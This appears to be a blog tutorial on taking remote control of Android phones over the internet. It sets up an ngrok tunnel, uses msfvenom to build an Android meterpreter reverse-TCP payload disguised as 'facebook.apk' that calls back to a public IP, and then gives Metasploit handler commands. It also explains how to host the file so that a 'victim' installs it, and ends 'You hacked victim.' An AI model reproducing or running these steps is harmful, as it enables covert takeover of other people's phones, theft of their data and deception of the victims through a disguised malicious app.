Sponsored
Ethical Hacking

How to Hack Android Phone over the WAN

As you know we already discussed about android hacking over LAN ( Local Area Network ). Click here to see. Now in this article we will talk about how to access any android phone over WAN ( Wide Area Network ) without port forwarding.

What is LAN ?

Local area network is also known as computer network which can be used only for limited area such as college, university, campus, office etc.

What is WAN ?

Wide area network is a telecommunication network which can be used for large geographical communication purpose.

How Ngrok works?

Ngork is like a reverse proxy which create a tunnel between server and client and when client access your webserver, the traffic will come to you through the ngrok proccess. In simple words, the ngrok convert your localhost into public.

Lets Begin !!

We need to first signup on ngrok.

After signup go to ngrok dashboard, copy the ngrok token and download it on the basis of your operating system (OS).

Start your kali linux and navigate terminal on desktop. Now unzip the ngrok file and place it in your favorite directory.

Paste your token where you have placed the ngrok file.

After pasting the token you will observe ngrok file will be created automatically. You need to go on that file and paste the below given code.

nano /root/.ngrok2/ngrok.yml
tunnels:
  httpbin:
    proto: http
    addr: 80
  demo:
    proto: tcp
    addr: 4444

That’s it ! You have done the configuration of ngrok.

Start your ngrok server using the following commands.

./ngrok start --all

When the connection established two terminals will open in front of you. Now copy the highlighted TCP tunnel, go to the new terminal and ping it there so that we can get the public IP address.

ping 0.tcp.ngrok.io

You need one public port which you will get in terminal.

After getting IP address and port you need to create a payload using the following command.

msfvenom -p android/meterpreter/reverse_tcp lhost=3.13.191.225 lport=14416 R > facebook.apk

For controlling this payload start metasploit framework and execute the following commands.

msfconsole
se exploit/multi/handler 
set payload android/meterpreter/reverse_tcp
set lhost 0.0.0.0
set lport 4444
exploit

If you want to share your payload to anyone so configure apache on kali linux and move payload on that directory as given below.

You can use this link for sharing the payload which you will get on terminal.

Once victim installed and open the payload, you will observe meterpreter session will open.

BOOM !! You hacked victim.

Sponsored

View Comments

Recent Posts

Termux Cheat Sheet for Hackers

Hey Folks :) !! In this article, we present the "Termux Cheat Sheet for Hackers"…

1 month ago

Cracking the X-Factor in Cybersecurity: How Humans are Protecting the Systems?

Amid the rapid advancement of technology, the significance of human involvement in cybersecurity frequently goes…

8 months ago

Cariddi – Hidden Endpoint Finder for Bug Hunting

Hey Folks, we are back today after such a long break, but don't worry we…

2 years ago

API Security Testing 101: Know Everything About API Security Testing!

The security of your API should be one of the top priorities of companies. Without…

2 years ago

7 Best Tools for Web Penetration Testing: Comprehensive Details

Hey Folks, In today's business world, it is essential to have an online presence. However,…

2 years ago

Cyber Security Audits: Everything You Need to Know About It

Hey Folks, Is your business prepared in case of a cyber attack? Many companies don't…

2 years ago
Sponsored

This website uses cookies.